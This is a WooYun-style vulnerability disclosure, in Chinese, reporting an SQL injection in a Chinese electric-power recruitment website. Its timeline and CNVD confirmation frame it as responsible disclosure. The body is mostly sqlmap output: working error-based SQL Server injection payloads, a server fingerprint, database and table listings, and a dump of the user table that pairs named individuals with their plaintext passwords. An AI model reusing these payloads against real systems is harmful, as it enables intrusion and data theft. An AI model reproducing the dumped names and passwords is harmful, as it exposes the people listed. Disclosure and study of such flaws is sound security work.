乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-01: 细节已通知厂商并且等待厂商处理中 2015-12-04: 厂商已经确认,细节仅向厂商公开 2015-12-14: 细节向核心白帽子及相关领域专家公开 2015-12-24: 细节向普通白帽子公开 2016-01-03: 细节向实习白帽子公开 2016-01-18: 细节向公众公开
电力高级人才网存在SQL注入/泄露上万的简历信息,影响多个数据库。
注入点:http://**.**.**.**/show.aspx?ID=2015101609225000015
sqlmap identified the following injection point(s) with a total of 309 HTTP(s) requests:---Parameter: ID (GET) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: ID=2015101609225000015' AND 6200=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(113)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (6200=6200) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(106)+CHAR(98)+CHAR(113))) AND 'NoyN'='NoyN---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.6, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008sqlmap identified the following injection point(s) with a total of 309 HTTP(s) requests:---Parameter: ID (GET) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: ID=2015101609225000015' AND 6079=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (6079=6079) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(106)+CHAR(113))) AND 'xoTQ'='xoTQ---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.6, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008current database: 'dlwebdb'current user is DBA: Falseavailable databases [14]:[*] cptdb[*] cptdb_yj[*] cptdb_yj_dl[*] dddb[*] dldb_yj[*] dlwebdb[*] FinanceSystemDB[*] fyh_cptdb[*] fyh_xsdydb[*] hbdb[*] master[*] model[*] msdb[*] tempdb
数据库的数据量。Database: dlwebdb+------------------------+---------+| Table | Entries |+------------------------+---------+| dbo.gj_jobkeyword | 1421129 || dbo.gj_bbsinfo | 171712 || dbo.gj_compjob | 128830 || dbo.gj_jobhistory | 91820 || dbo.gj_jobaddno | 67771 || dbo.gj_userlist | 64378 || dbo.gj_jobeducation | 59881 || dbo.gj_jobinfo | 57425 || dbo.gj_posaddno | 53193 || dbo.gj_positioninfo | 52456 || dbo.gj_jobkeyinfo | 49454 || dbo.gj_jobtxtlist | 30864 || dbo.gj_complookjob | 27646 || dbo.myTableInfo | 26888 || dbo.Table1 | 21659 || dbo.gj_report | 19390 || dbo.gj_webinfo | 13787 || dbo.myTableList | 12634 || dbo.gj_compaddno | 9419 || dbo.gj_agreement | 8977 || dbo.gj_agreeaddno | 8569 || dbo.gj_companyinfo | 8205 || dbo.gj_checkinfo | 4920 || dbo.myepjoblist | 4090 || dbo.myTablejobhistory | 2451 || dbo.gj_bbsuserlist | 2390 || dbo.myTablejobedu | 1870 || dbo.myTableJobinfo | 1845 || dbo.gj_bbstotallist | 1431 || dbo.gj_jobkeylist | 1241 || dbo.gj_companyinfo_bak | 1090 || dbo.gj_bbsrecinfo | 1014 || dbo.bjxJobList2 | 999 || dbo.gj_areainfo | 824 || dbo.myTableLook | 531 || dbo.gj_compjob_bak | 433 || dbo.gj_specialinfo | 315 || dbo.gj_jobinfo_bak | 287 || dbo.gj_posinfo | 187 || dbo.gj_myjoblist | 183 || dbo.gj_compproperty | 97 || dbo.gj_bbscoluminfo | 31 || dbo.gj_nbwebinfo | 27 || dbo.gj_userinfo | 23 || dbo.gj_userconnect | 22 || dbo.gj_webcol | 12 || dbo.gj_educationinfo | 10 || dbo.gj_headhunter | 5 |+------------------------+---------+
用户信息:
Table: gj_userinfo[23 entries]+---------------------+---------------+-------------+----------------+----------+-----------+-----------+-----------+--------------+------------------------------------+| userid | load_ip | userpwd | username | usercode | isenabled | usercname | userclass | load_pretime | load_curtime |+---------------------+---------------+-------------+----------------+----------+-----------+-----------+-----------+--------------+------------------------------------+| 201209251123010001 | **.**.**.** | 111 | yjh@**.**.**.** | 00001 | Y | 杨建宏 | 9 | NULL | 07 20 2015 \\?a0\\?33:40PM || 201209251123010002 | **.**.**.** | 87508617 | yangjie | 00002 | Y | 杨结 | 9 | NULL | 11 27 2015 \\?a0\\?33:20PM || 201209251123010003 | NULL | zmjy7631986 | zhangming | 00003 | N | 张明 | 1 | NULL | 03 19 2013 \\?a0\\?32:42PM || 201209251123010004- | **.**.**.** | 349694645 | wangyegang | 00004 | Y | 王叶纲 | 9 | NULL | 11 26 2015 \\?a0\\?35:27PM || 201209251123010005 | **.**.**.** | 15575889742 | zhouwei | 00005 | Y | 周维 | 1 | NULL | 07 22 2015 \\?a0\\?38:28AM || 201209251123010006 | NULL | 87508617 | huxueli | 00006 | N | 胡雪莉 | 1 | NULL | 10 18 2013 10:18AM || 201209251123010008 | NULL | 719009 | xuliequan | 00008 | N | 许烈全 | 1 | NULL | 03 \\?a0\\?31 2013 \\?a0\\?38:52AM || 201209251123010009 | **.**.**.** | 87508617 | huangxianghong | 00009 | Y | 黄祥红 | 1 | NULL | 08 17 2015 11:15AM || 201209251123010010 | NULL | 888888 | chenyerui | 00010 | N | 陈业瑞 | 1 | NULL | 05 \\?a0\\?39 2013 10:35AM || 201209251123010011 | NULL | hly182 | heliying | 00011 | N | 何丽英 | 1 | NULL | 09 30 2013 \\?a0\\?31:53PM || 201209251123010012 | NULL | 888888 | zhubinbin | 00012 | N | 朱彬彬 | 1 | NULL | 07 17 2013 \\?a0\\?35:51PM || 201209251123010013 | NULL | 265399 | yangsong | 00013 | N | 杨松 | 1 | NULL | 08 23 2013 \\?a0\\?34:29PM || 201209251123010014 | NULL | 888888 | gaolin | 00014 | N | 高林 | 1 | NULL | 07 18 2013 \\?a0\\?39:20AM || 201209251123010015 | **.**.**.** | gm123123 | guomin | 00015 | Y | 郭敏 | 9 | NULL | 11 27 2015 10:42PM || 201209251123010016 | NULL | 666666 | yuanyabo | 00016 | N | 袁亚波 | 1 | NULL | 02 19 2014 \\?a0\\?34:45PM || 201209251123010017 | NULL | 888888 | luyanqun | 00017 | N | 陆燕群 | 1 | NULL | 10 16 2013 \\?a0\\?32:29PM || 201209251123010018 | NULL | 11221122 | changbin | 00018 | Y | 常斌 | 1 | NULL | 08 12 2014 \\?a0\\?39:43AM || 201209251123010019 | NULL | *881016* | yuanfeng | 00019 | N | 袁峰 | 1 | NULL | 06 24 2014 \\?a0\\?33:15PM || 201209251123010020 | NULL | 11221122 | fangang | 00020 | Y | 樊刚 | 1 | NULL | 08 13 2014 \\?a0\\?31:49PM || 201209251123010021 | **.**.**.** | 888888 | huangkexiang | 00021 | Y | 黄克祥 | 1 | NULL | 05 19 2015 \\?a0\\?39:23PM || 201209251123010022 | <blank> | 888888 | zhoulingyu | 00022 | Y | 周玲玉 | 1 | NULL | 08 25 2015 \\?a0\\?38:29AM || 201209251123010023 | **.**.**.** | 888888 | panhuan | 00023 | Y | 潘欢 | 1 | NULL | 08 17 2015 \\?a0\\?38:23AM || 202209251123010007 | NULL | 876256 | tianwei | 00007 | Y | 删除库 | 1 | NULL | 01 \\?a0\\?34 2013 \\?a0\\?35:55PM |+---------------------+---------------+-------------+----------------+----------+-----------+-----------+-----------+--------------+------------------------------------
简历信息:
Table: mytableinfo[44 columns]+---------------+----------+| Column | Type |+---------------+----------+| addr | varchar || age | int || birthadr | varchar || birthday | datetime || class1 | varchar || class2 | varchar || cname | varchar || country | varchar || curadr | varchar || education | text || email | varchar || getadr | varchar || getadr1 | varchar || getadr2 | varchar || getcname | varchar || getdate | datetime || getjob1 | varchar || getjob2 | varchar || getjob3 | varchar || getmoney | varchar || government | varchar || height | varchar || hightedu | varchar || host | varchar || inputdate | datetime || isget | char || jobid | varchar || jobno | varchar || jobtype | varchar || language1 | varchar || language2 | varchar || marry | varchar || modidate | datetime || nationality | varchar || phone | varchar || projectremark | text || remark | text || sex | varchar || startwork | varchar || tel | varchar || weight | varchar || workhistory | text || workpos | varchar || workyear | decimal |+---------------+----------+
危害等级:中
漏洞Rank:10
确认时间:2015-12-04 11:37
CNVD确认并复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。
暂无
